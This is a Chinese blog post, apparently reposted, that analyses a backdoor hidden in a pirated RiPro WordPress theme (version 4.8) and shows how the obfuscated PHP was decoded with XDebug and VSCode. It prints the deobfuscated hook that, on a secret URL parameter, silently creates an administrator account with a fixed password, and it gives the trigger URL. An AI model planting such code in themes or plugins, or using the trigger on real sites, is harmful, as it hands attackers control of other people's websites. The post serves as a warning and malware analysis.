关于本站ripro主题4.8版本后门分析[建站教程]

关于本站ripro主题4.8版本后门分析

关于本站ripro主题4.8版本后门分析[建站教程]

下载后用D盾扫描
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
发现有加密文件,用Notepad++查看
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
破解混淆加密后得到源文件
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
经查看发现后门代码
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃

01
02
03
04
05
06
07
08
09
10
11
12
add_action('wp_head''wp_backdoor');
function wp_backdoor()
{
        if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
                require('wp-includes/registration.php');
                if (!username_exists('backdoor')) { //检测是否存在backdoor账户
                        $user_id = wp_create_user('backdoor''123456'); //创建账户
                        $user new WP_User($user_id);
                        $user->set_role('administrator'); //设置为管理员权限
                }
        }
}

使用http(s)://你的域名/?backdoor=go访问,
自动创建用户名为backdoor密码为123456的管理员账户
本地测试
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃

关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃

关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
成功登录后台
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃

关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
推荐这种涉及到支付的主题还是用正版,盗版的就如作者所说,很容易被添加后门。
毕竟没有真正免费的午餐。


解密后的文件

蓝奏盘:https://lanzoui.com/i836ukh

后门代码已注释,位于412-423行

看到有人想要学习解密php混淆加密
使用工具:PHP7.2+XDebug+VSCode{必备插件[PHP Debug(XDebug调试)+PHP IntelliSense(代码格式化)+Code Runner(快速运行php文件,方便调试)}
当然还有其他配置比如:XDebug安装,Code Runner php文件路径配置等,还是等下一次再出个php调试环境详细配置教程吧。
原文件用VSCode打开是这样的

先格式化(右键-格式化文档,多格式化几次)

保存,改编码为Western (Windows 1252)【本次解密非必须】

使用 Ctrl + Shift + P 打开快捷指令,输入 encoding,选择用 Change File Encoding,选择 Reopen with Encoding,选择 Western (Windows 1252)。

Windows 1252 是个单字节的字节集,不会出现任何 2 个字节被显示成 1 个字符的问题,其他的单字节集通常也可以。 ——@Ganlv

创建PHP调试launch.json文件
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
默认配置就可以了,开始调试
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
运行PHP文件
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
单步调试(F11)
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
一直调试可以看见不停的给变量赋值解密函数
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
多运行几步就会发现源码直接出来了
关于本站ripro主题4.8版本后门分析[建站教程]-度崩网-几度崩溃
比起Ganlv大神解密的zym/phpjm混淆解密还简单,毕竟没有反调试。
很适合新手入门破解,欢迎交流学习。

转载自吾爱破解

给TA打赏
共{{data.count}}人
人已打赏
WordPress教程

WordPress主题RiPro 优化(第二期:码支付)

2019-12-17 11:30:22

WordPress教程

wordpress使用代码来过滤和阻止垃圾评论[Wordpress教程]

2019-12-18 14:40:57

本站所发布的一切源码、模板、应用等文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权。本站内容适用于DMCA政策。若您的权利被侵害,请与我们联系处理,站长 QQ: 84087680 或 点击右侧 私信:盾给网 反馈,我们将尽快处理。
⚠️
本站所发布的一切源码、模板、应用等文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权。本站内容适用于DMCA政策
若您的权利被侵害,请与我们联系处理,站长 QQ: 84087680 或 点击右侧 私信:盾给网 反馈,我们将尽快处理。
9 条回复 A文章作者 M管理员
  1. 七先生

    ✗不爽✗

  2. aurora007

    你们发布的是有后门的吗

    • 盾给网

      之前的有后门,需要处理一下

  3. schezi

    人间总有真情在

  4. 5656978

    人间总有真情在

  5. q261008487

    人间总有真情在

  6. linke

    看看看看

  7. 张子夜

    444

  8. adongit

    人间总有真情在啊

个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索